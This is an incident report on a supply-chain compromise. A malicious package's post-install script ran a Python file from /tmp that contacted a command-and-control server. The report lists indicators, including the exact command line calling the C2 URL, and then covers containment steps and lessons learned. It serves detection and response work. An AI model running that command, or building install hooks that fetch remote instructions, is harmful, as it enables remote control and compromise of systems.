C2 Network Activity

What Happened

A Python script (/tmp/ld.py) was observed making outbound HTTP connections to an external host (sfrclak.com:8000). The script was spawned by a package manager install event, suggesting a supply chain compromise where a malicious package included a post-install script.

Network telemetry showed repeated TCP connections on port 8000, with the payload pulling down additional instructions from the C2 server. The process hash was not associated with any known legitimate software.

Evidence

Key Indicators

• Command Line: python3 /tmp/ld.py http://sfrclak.com:8000/6202033
• C2 Server: sfrclak.com on port 8000
• Protocol: HTTP over TCP, outbound connections
• File Hash: 8295ee25cfdb239f3e165afceda7f46de73e2b606ff0e2e3d8623e3facd30acc
• Entry Vector: Malicious package post-install script

Response

The affected system was isolated from the network. The malicious script and its parent package were removed. The C2 domain was blocked at the firewall and DNS level. A sweep was conducted across all endpoints for the file hash and network IOCs.

Lessons Learned

• Package manager installs can execute arbitrary code - monitor post-install script activity
• Scripts executing from /tmp with network connections are a strong signal for compromise
• Correlating process creation with network activity provides the full picture fast

References

• MITRE ATT&CK T1059.006 - Python
• MITRE ATT&CK T1071.001 - Web Protocols
• MITRE ATT&CK T1195.002 - Compromise Software Supply Chain